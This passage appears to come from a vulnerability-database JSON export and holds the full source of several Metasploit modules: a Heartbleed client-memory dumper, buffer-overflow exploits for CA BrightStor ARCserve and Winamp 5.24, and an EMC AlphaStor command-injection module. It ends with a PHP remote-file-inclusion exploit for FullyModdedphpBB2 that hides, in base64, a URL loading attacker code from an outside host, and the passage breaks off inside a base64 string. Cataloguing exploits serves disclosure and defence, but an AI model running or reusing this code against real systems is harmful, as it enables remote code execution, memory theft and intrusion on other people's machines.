message_version, message_code)}\")\n\n if message_type == 0x16\n print_status(\"#{@state[c][:name]} Processing Client Finished...\")\n end\n\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << buff\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Encrypted heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n\n # Dump captured memory to a file on disk using the loot API\n def store_captured_heartbeats(c)\n if @state[c][:heartbeats].length > 0\n begin\n path = store_loot(\n \"openssl.heartbleed.client\",\n \"application/octet-stream\",\n @state[c][:ip],\n @state[c][:heartbeats],\n nil,\n \"OpenSSL Heartbleed client memory\"\n )\n print_good(\"#{@state[c][:name]} Heartbeat data stored in #{path}\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception\n print_error(\"#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}\")\n end\n\n # Report the memory disclosure as a vulnerability on the host\n report_vuln({\n :host => @state[c][:ip],\n :name => self.name,\n :info => \"Module #{self.fullname} successfully dumped client memory contents\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }) rescue nil # Squash errors related to ip => 127.0.0.1 and the like\n end\n\n # Clear the heartbeat array\n @state[c][:heartbeats] = \"\"\n @state[c][:shutdown] = true\n end\n\n # Delete the state on connection close\n def on_client_close(c)\n # Do we have any pending heartbeats to save?\n if @state[c][:heartbeats].length > 0\n store_captured_heartbeats(c)\n end\n @state.delete(c)\n end\n\n # Send an OpenSSL Server Hello response\n def openssl_send_server_hello(c, hello, version)\n\n # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the\n # first cipher suite sent by the client.\n if @state[c][:encrypted]\n cipher = \"\\x00\\x2F\"\n else\n cipher = hello[46, 2]\n end\n\n # Create the Server Hello response\n extensions =\n \"\\x00\\x0f\\x00\\x01\\x01\" # Heartbeat\n\n server_hello_payload =\n [version].pack('n') + # Use the protocol version sent by the client.\n @state[c][:server_random] + # Random (Timestamp + Random Bytes)\n \"\\x00\" + # Session ID\n cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)\n \"\\x00\" + # Compression Method (none)\n [extensions.length].pack('n') + extensions\n\n server_hello = [0x02].pack(\"C\") + [ server_hello_payload.length ].pack(\"N\")[1,3] + server_hello_payload\n\n msg1 = \"\\x16\" + [version].pack('n') + [server_hello.length].pack(\"n\") + server_hello\n c.put(msg1)\n\n # Skip the rest of TLS if we arent negotiating it\n unless negotiate_tls?\n # Send a heartbeat request to start the stream and return\n openssl_send_heartbeat(c, version)\n return\n end\n\n # Certificates\n certs_combined = generate_certificates\n pay2 = \"\\x0b\" + [ certs_combined.length + 3 ].pack(\"N\")[1, 3] + [ certs_combined.length ].pack(\"N\")[1, 3] + certs_combined\n msg2 = \"\\x16\" + [version].pack('n') + [pay2.length].pack(\"n\") + pay2\n c.put(msg2)\n\n # End of Server Hello\n pay3 = \"\\x0e\\x00\\x00\\x00\"\n msg3 = \"\\x16\" + [version].pack('n') + [pay3.length].pack(\"n\") + pay3\n c.put(msg3)\n end\n\n # Send the heartbeat request that results in memory exposure\n def openssl_send_heartbeat(c, version)\n c.put \"\\x18\" + [version].pack('n') + \"\\x00\\x03\\x01\" + [heartbeat_read_size].pack(\"n\")\n end\n\n # Pack the certificates for use in the TLS reply\n def generate_certificates\n certs = []\n certs << generate_certificate.to_der\n certs_combined = certs.map { |cert| [ cert.length ].pack(\"N\")[1, 3] + cert }.join\n end\n\n # Generate a self-signed certificate to use for the service\n def generate_certificate\n key = @cert_key\n cert = OpenSSL::X509::Certificate.new\n cert.version = 2\n cert.serial = rand(0xFFFFFFFF)\n\n subject_cn = Rex::Text.rand_hostname\n subject = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", subject_cn],\n ])\n issuer = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n ])\n\n cert.subject = subject\n cert.issuer = issuer\n cert.not_before = Time.now - (3600 * 24 * 365) + rand(3600 * 14)\n cert.not_after = Time.now + (3600 * 24 * 365) + rand(3600 * 14)\n cert.public_key = key.public_key\n ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)\n cert.extensions = [\n ef.create_extension(\"basicConstraints\",\"CA:FALSE\"),\n ef.create_extension(\"subjectKeyIdentifier\",\"hash\"),\n ef.create_extension(\"extendedKeyUsage\",\"serverAuth\"),\n ef.create_extension(\"keyUsage\",\"keyEncipherment,dataEncipherment,digitalSignature\")\n ]\n ef.issuer_certificate = cert\n cert.add_extension ef.create_extension(\"authorityKeyIdentifier\", \"keyid:always,issuer:always\")\n cert.sign(key, OpenSSL::Digest::SHA1.new)\n cert\n end\n\n # Decrypt the TLS message and return the result without the MAC\n def decrypt_data(c, data)\n return unless @state[c][:client_enc]\n\n cipher = @state[c][:client_enc]\n\n begin\n buff = cipher.update(data)\n buff << cipher.final\n\n # Trim the trailing MAC signature off the buffer\n if buff.length >= 20\n return buff[0, buff.length-20]\n end\n rescue ::OpenSSL::Cipher::CipherError => e\n print_error(\"#{@state[c][:name]} Decryption failed: #{e}\")\n end\n\n nil\n end\n\n # Calculate keys and toggle encrypted status\n def initialize_encryption_keys(c)\n tls1_calculate_crypto_keys(c)\n @state[c][:encrypted] = true\n end\n\n # Determine crypto keys for AES-128-CBC based on the master secret\n def tls1_calculate_crypto_keys(c)\n @state[c][:master] = tls1_calculate_master_key(c)\n return unless @state[c][:master]\n\n key_block = tls1_prf(\n @state[c][:master],\n \"key expansion\" + @state[c][:server_random] + @state[c][:client_random],\n (20 * 2) + (16 * 4)\n )\n\n # Extract the MAC, encryption, and IV from the keyblock\n @state[c].update({\n :client_write_mac_key => key_block.slice!(0, 20),\n :server_write_mac_key => key_block.slice!(0, 20),\n :client_write_key => key_block.slice!(0, 16),\n :server_write_key => key_block.slice!(0, 16),\n :client_iv => key_block.slice!(0, 16),\n :server_iv => key_block.slice!(0, 16),\n })\n\n client_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n client_cipher.key = @state[c][:client_write_key]\n client_cipher.iv = @state[c][:client_iv]\n client_cipher.decrypt\n client_mac = OpenSSL::HMAC.new(@state[c][:client_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n server_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n server_cipher.key = @state[c][:server_write_key]\n server_cipher.iv = @state[c][:server_iv]\n server_cipher.encrypt\n server_mac = OpenSSL::HMAC.new(@state[c][:server_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n @state[c].update({\n :client_enc => client_cipher,\n :client_mac => client_mac,\n :server_enc => server_cipher,\n :server_mac => server_mac\n })\n\n true\n end\n\n # Determine the master key from the premaster and client/server randoms\n def tls1_calculate_master_key(c)\n return unless (\n @state[c][:premaster] and\n @state[c][:client_random] and\n @state[c][:server_random]\n )\n tls1_prf(\n @state[c][:premaster],\n \"master secret\" + @state[c][:client_random] + @state[c][:server_random],\n 48\n )\n end\n\n # Random generator used to calculate key data for TLS 1.0/1.1\n def tls1_prf(input_secret, input_label, output_length)\n # Calculate S1 and S2 as even blocks of each half of the secret\n # string. If the blocks are uneven, then S1's last byte should\n # be duplicated by S2's first byte\n blen = (input_secret.length / 2.0).ceil\n s1 = input_secret[0, blen]\n s2_index = blen\n if input_secret.length % 2 != 0\n s2_index -= 1\n end\n s2 = input_secret[s2_index, blen]\n\n # Hash the first part with MD5\n out1 = tls1_p_hash('md5', s1, input_label, output_length).unpack(\"C*\")\n\n # Hash the second part with SHA1\n out2 = tls1_p_hash('sha1', s2, input_label, output_length).unpack(\"C*\")\n\n # XOR the results together\n [*(0..out1.length-1)].map {|i| out1[i] ^ out2[i] }.pack(\"C*\")\n end\n\n # Used by tls1_prf to generate arbitrary amounts of session key data\n def tls1_p_hash(digest, secret, label, olen)\n output = \"\"\n chunk = OpenSSL::Digest.new(digest).digest_length\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n\n ctx.update(label)\n a1 = ctx.digest\n\n loop do\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx.update(a1)\n ctx_tmp.update(a1)\n ctx.update(label)\n\n if olen > chunk\n output << ctx.digest\n a1 = ctx_tmp.digest\n olen -= chunk\n else\n a1 = ctx.digest\n output << a1[0, olen]\n break\n end\n end\n\n output\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/openssl_heartbeat_client_memory.rb"}, {"lastseen": "2019-10-12T13:41:52", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.\n", "modified": "2017-07-24T13:26:21", "published": "2010-10-04T22:00:22", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/MESSAGE_ENGINE_72", "href": "", "type": "metasploit", "title": "CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n the buffer and execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '68329'],\n [ 'URL', 'http://www.metasploit.com/users/mc' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'BrightStor ARCserve r11.5/Windows 2003',\t{ 'Ret' => 0x2380ceb5 } ],\n ],\n 'DisclosureDate' => 'Oct 4 2010',\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(6504)])\n end\n\n def exploit\n\n connect\n\n handle = dcerpc_handle('506b1890-14c8-11d1-bbc3-00805fa6962e', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])\n print_status(\"Binding to #{handle} ...\")\n\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n\n sploit = NDR.string(rand_text_english(760) + generate_seh_payload(target.ret) + \"\\x00\") + NDR.long(0)\n\n print_status(\"Trying target #{target.name}...\")\n\n begin\n dcerpc_call(0x72, sploit)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n handler\n disconnect\n\n end\n\nend\n=begin\n/* opcode: 0x72, address: 0x28E893D0 */\n\nshort sub_28E893D0 (\n [in] handle_t arg_1,\n [in][ref][string] char * arg_2,\n [in, out][ref] long * arg_3\n);\n=end\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/brightstor/message_engine_72.rb"}, {"lastseen": "2019-11-24T11:19:34", "bulletinFamily": "exploit", "description": "EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.\n", "modified": "2019-07-26T23:53:46", "published": "2008-09-01T11:28:55", "id": "MSF:AUXILIARY/ADMIN/EMC/ALPHASTOR_DEVICEMANAGER_EXEC", "href": "", "type": "metasploit", "title": "EMC AlphaStor Device Manager Arbitrary Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'EMC AlphaStor Device Manager Arbitrary Command Execution',\n 'Description' => %q{\n EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],\n [ 'OSVDB', '45715' ],\n [ 'CVE', '2008-2157' ],\n [ 'BID', '29398' ],\n ],\n 'DisclosureDate' => 'May 27 2008'))\n\n register_options(\n [\n Opt::RPORT(3000),\n OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),\n ])\n end\n\n def run\n connect\n\n data = \"\\x75\" + datastore['CMD']\n pad = \"\\x00\" * 512\n\n pkt = data + pad\n\n print_status(\"Sending command: #{datastore['CMD']}\")\n sock.put(pkt)\n\n # try to suck it all in.\n select(nil,nil,nil,5)\n\n res = sock.get_once || ''\n\n res.each_line do |info|\n print_status(\"#{info.gsub(/[^[:print:]]+/,\"\")}\") # hack.\n end\n\n disconnect\n rescue ::Rex::ConnectionError => e\n print_error 'Connection failed'\n rescue ::EOFError => e\n print_error 'No reply'\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb"}, {"lastseen": "2019-11-05T00:23:32", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Winamp 5.24. By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be exploited from the browser or the Winamp client itself.\n", "modified": "2017-09-14T02:03:34", "published": "2008-03-01T17:20:24", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/WINAMP_ULTRAVOX", "href": "", "type": "metasploit", "title": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::TcpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Winamp 5.24. By\n sending an overly long artist tag, a remote attacker may\n be able to execute arbitrary code. This vulnerability can be\n exploited from the browser or the Winamp client itself.\n },\n 'Author' => 'MC',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-0065' ],\n [ 'OSVDB', '41707' ],\n [ 'BID', '27344' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 700,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\",\n 'StackAdjustment' => -3500,\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Winamp 5.24', { 'Ret' => 0x15010d3e } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jan 18 2008',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The HTTP daemon port to listen on.\", 8080 ])\n ])\n end\n\n def on_client_connect(client)\n return if ((p = regenerate_payload(client)) == nil)\n\n res = client.get_once\n\n content = \"\\x00\\x01\\x00\\x01\\x00\\x01\" + \"<metadata><song><artist>\"\n content << make_nops(3828 - payload.encoded.length) + payload.encoded\n content << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')\n content << [0xe8, -850].pack('CV') + rand_text_alpha_upper(1183)\n content << \"</artist></song></metadata>\"\n\n sploit = \"\\x5a\\x00\\x39\\x01\" + [content.length].pack('n')\n sploit << content + \"\\x00\"\n\n # randomize some stuff.\n num = rand(65535).to_s\n\n header = \"HTTP/1.0 200 OK\\r\\n\"\n header << \"Server: Ultravox 3.0\\r\\n\"\n header << \"Content-Type: misc/ultravox\\r\\n\"\n header << \"Ultravox-SID: #{num}\\r\\n\"\n header << \"Ultravox-Avg-Bitrate: #{num}\\r\\n\"\n header << \"Ultravox-Max-Bitrate: #{num}\\r\\n\"\n header << \"Ultravox-Max-Msg: #{num}\\r\\n\"\n header << \"Ultravox-Stream-Info: Ultravox;Live Stream\\r\\n\"\n header << \"Ultravox-Msg-Que: #{num}\\r\\n\"\n header << \"Ultravox-Max-Fragments: 1\\r\\n\\r\\n\"\n header << sploit\n\n print_status(\"Sending #{header.length} bytes\")\n\n client.put(header)\n handler(client)\n\n service.close_client(client)\n end\nend\n\n\n=begin\nHTTP/1.0 200\n.Server: Ultravo\nx 3.0..Content-T\nype: misc/ultrav\nox..Ultravox-SID\n: 22221..Ultravo\nx-Avg-Bitrate: 6\n4000..Ultravox-M\nax-Bitrate: 9600\n0..Ultravox-Max-\nMsg: 16000..Ultr\navox-Stream-Info\n: Ultravox;Live\nStream..Ultravox\n-Msg-Que: 39..Ul\ntravox-Max-Fragm\n\nZ.9..,......<met\nadata><length>0<\n/length><soon>Mo\nre on\n</soon><song><na\nme>The Night\nghts In\ntin</name><album\n>Days Of\nPassed</album><a\nrtist>The Moody\nBlues</artist><a\nlbum_art>xm/stat\nion_logo_WBCRHT.\njpg</album_art><\nalbum_art_200>xm\n/station_logo_WB\nCRHT_200.jpg</al\nbum_art_200><ser\nial>-1</serial><\nsong_id>-1</song\n_id><amg_song_id\n>-1</amg_song_id\n><amg_artist_id>\n-1</amg_artist_i\nd><amg_album_id>\n-1</amg_album_id\n><itunes_song_id\n>-1</itunes_song\n_id><itunes_arti\nst_id>-1</itunes\n_artist_id><itun\nes_album_id>-1</\nitunes_album_id>\n</song></metadat\na>.Z.......\\./!.\n!.UP.......B...&\nZ....D)ydB.,.vy/\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/winamp_ultravox.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-04-22T00:00:00", "published": "2007-04-22T00:00:00", "id": "SECURITYVULNS:VULN:7622", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7622", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "Hello,,\r\n\r\nFullyModdedphpBB2 Remote File Inclusion .. With exploit :)\r\n\r\nDiscovered By : HACKERS PAL\r\nCopy rights : HACKERS PAL\r\nWebsite : http://www.soqor.net\r\nEmail Address : security@soqor.net\r\n\r\n\r\n/* Script info\r\n## Mod Title: FullyModdedphpBB2\r\n## Description: A fully modded phpBB\r\n*/\r\n\r\nRemote File Include:\r\nsubscp.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt?\r\n\r\nExploit:\r\n<?php\r\n/************************************************/\r\n/* Fully Moded PHPBB2 Command Execution Exploit */\r\n/* By : HACKERS PAL <security@soqor.net> */\r\n/* Website : WwW.SoQoR.NeT */\r\n/************************************************/\r\n\r\nerror_reporting(0);\r\nini_set("max_execution_time",0);\r\nFunction get_page($url){if(function_exists("file_get_contents")){$contents=file_get_contents($url);}else{$fp=fopen("$url","r");while($line=fread($fp,1024)){$contents=$contents.$line;}}return$contents;}\r\nEcho "<body bgcolor=\"#000000\" text=\"#00FF00\">\n<title>Fully Moded PHPBB2 Command Execution Exploit by : HACKERS PAL :: WwW.SoQoR.NeT ::</title>\n\r"."<h2>Fully Moded PHPBB2 Command Execution\n\r"."<h3>By : HACKERS PAL [security@soqor.net]\n\r"."<h3>VisiT My Website [<a href=\"http://WwW.SoQoR.NeT\">WwW.SoQoR.NeT</a>]\n\r";\r\n $expl=base64_decode("c3Vic2NwLnBocD9waHBiYl9yb290X3BhdGg9aHR0cDovL3BzZXZpbC5nb29nbGVwYWdlcy5jb20vY21kLnR4dD8=");\r\n $action=$_GET['action'];\r\n if($action == "")\r\n {\r\n echo "<form action=\"$PHP_SELF?action=2\" method=\"post\">\n Web URL -- Example : http://localhost/FullyModed\n <br> <input type=\"text\" name=\"url\" style=\"width:250\">\n <br> <br>\n Command : <br> <textarea name=\"query\" cols=\"70\" rows=\"5\"></textarea>\n <br>\n <br> <div align=\"center\">\n <input type=\"submit\"> </div>\n </form>\n ";\r\n }\r\n else\r\n {\r\n $exploit=$_POST['url']."/".$expl."&cmd=".$_POST['query'];\r\n\r\n $page=get_page($exploit);\r\n if(!eregi("hacking attempt",$page))\r\n {\r\n Echo "<h1> Command Successfully executed .. Result is</h1> $page <br> Thanks For Using This exploit .. Have Fun :)<br><br><br>";\r\n\r\n }\r\n\r\n }\r\ndie(base64_decode("PGRpdiBhbGlnbj0iY2VudGVyIj4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+RUU8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj50PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5aPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjoKPC9mb250Pgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+CkQ8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5ldmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPkw8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj4tPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4wMDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5oQTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmphPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5saSA8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkZGRkZGIj4sPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KRDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPnIuPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5FPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+eDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGU\r\n iPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+YUNrZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5wPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj4xZDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5OPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZXQgLAo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5CPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bGFjawo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+dHRhQzwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+azwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pbmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5hPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5uPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ICwKPC9mb250Pgo8Zm9u\r\n dCBjb2xvcj0iI0ZGMDAwMCI+SjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmE8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPnJlPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+SDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPjxmb250IGNvbG9yPSIjRkYwMDAwIj4KQjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmE8L2ZvbnQ+PC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5naDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmRhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5EPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIj4KLCA8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkQ8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnIgPC9mb250Pgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+SDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+YTwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+Y2s8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnI8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPgosPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+PGJyPgo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5TPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cDwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+ZWM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pYTwvZ\r\n m9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+bCBHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+RUU8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj50PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5aPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPkY8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vciA6CjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5RPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPi48L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk48L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5lPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5UPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlQ8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5lYTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+TTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPgo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bjwvZm9udD48